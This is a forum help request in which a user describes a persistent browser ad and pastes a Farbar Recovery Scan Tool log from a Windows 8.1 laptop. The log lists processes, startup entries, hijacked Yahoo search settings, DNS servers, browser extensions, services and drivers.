jrsanders69
2016-03-04, 21:25
I do believe that I have provided everything that you request in order to better help me. My problem is that I am visiting websites and a permanent ad appears in the lower right hand corner that will not go away. It covers up the scroll bar as well. I have run S&D and AdwCleaner (both with fixes). I hope you can help.
Thanks
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-03-2016
Ran by Fawn (administrator) on FAWNS (04-03-2016 10:04:58)
Running from C:\Users\Fawn\Desktop
Loaded Profiles: Fawn (Available Profiles: Fawn)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
(Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-12] (Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2830576 2014-08-31] (Synaptics Incorporated)
HKLM-x32\...\Run: [Digital Coupon Print Driver] => "C:\Program Files (x86)\Digital Coupon Printer\DigitalCouponPrinter.exe"
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [GoogleChromeAutoLaunch_C53FAD65C2D6926885C453276F0F49A1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\MountPoints2: {bfef5019-d8ba-11e5-8272-d85de287d87e} - "D:\windows\AutoRun.exe"
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{2B499AA0-D03A-459F-AF7B-E066FC873886}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{973F3F7C-2B68-428F-A390-4A495C50EDD8}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{B1997D4E-969C-42FF-B8F2-0B5104AA2E37}: [DhcpNameServer] 82.163.142.7
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM-x32 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4258770641-917365270-2992294631-1001 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-12-20] (Hewlett-Packard Company)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-01-08] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-01-08] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Search Provided by Yahoo
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.google.com/?gws_rd=ssl
about:preferences
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-4258770641-917365270-2992294631-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Fawn\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-03-03] (Citrix Online)
FF Extension: Simple YouTube to MP3/MP4 Converter and Downloader - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid0-SQnwtgW1b8BsMB5PLV5WScEDWOjw@jetpack.xpi [2016-03-03]
FF Extension: Youtube MP3 Downloader using youtube-mp3.org - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid1-xKH0EoS44u1a2w@jetpack.xpi [2016-02-08]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-02-12] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe
Chrome:
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search provided by yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-23]
CHR Extension: (Google Docs) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-23]
CHR Extension: (Google Drive) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-23]
CHR Extension: (YouTube) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-23]
CHR Extension: (Google Search) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-23]
CHR Extension: (Page Eraser) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekofpchjmoalonajopdeegdappocgcmj [2016-03-04]
CHR Extension: (Test IE) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\eldlkpeoddgbmpjlnpfblfpgodnojfjl [2016-02-18]
CHR Extension: (Google Sheets) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-23]
CHR Extension: (Google Docs Offline) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-24]
CHR Extension: (Popup Blocker Pro) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\kiodaajmphnkcajieajajinghpejdjai [2016-03-03]
CHR Extension: (McAfee SECURE Safe Browsing) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkdiimaiohgpacfbgedcipmgigppaofn [2016-03-03]
CHR Extension: (FromDocToPDF) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-03-04]
CHR Extension: (BrowserStack Local) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfiddfehmfdojjfdpfngagldgaaafcfo [2016-01-28]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-23]
CHR Extension: (Gmail) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-23]
CHR Extension: (Open With Firefox) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\poeacjbaiakjnaepdjgggojcjoajakmd [2016-03-03]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-13] (Broadcom Corporation.)
R2 DptfParticipantAcpiProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26168 2015-12-20] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-09-12] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2016-01-08] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [332528 2014-03-12] (McAfee, Inc.)
R2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [681680 2016-01-08] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2015-11-18] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [380896 2016-01-21] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [275368 2015-11-18] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (Intel Security, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-12] (Realtek Semiconductor)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-08-31] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-19] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-19] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [38424 2010-10-18] (Google Inc)
S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-13] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7552760 2016-03-03] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2015-11-25] (McAfee, Inc.)
R3 DptfDevAcpiProc; C:\Windows\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel Corporation)
S3 DptfDevDisplay; C:\Windows\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel Corporation)
S3 DptfDevDram; C:\Windows\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel Corporation)
S3 DptfDevFan; C:\Windows\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel Corporation)
R3 DptfDevGen; C:\Windows\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel Corporation)
S3 DptfDevPch; C:\Windows\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel Corporation)
S3 DptfDevPower; C:\Windows\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-08-04] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2015-11-25] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351144 2015-11-25] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83096 2015-11-25] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2015-11-25] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [846080 2015-11-25] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [539496 2015-11-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-11-20] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2015-11-25] (McAfee, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-25] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-08-31] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-08-31] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
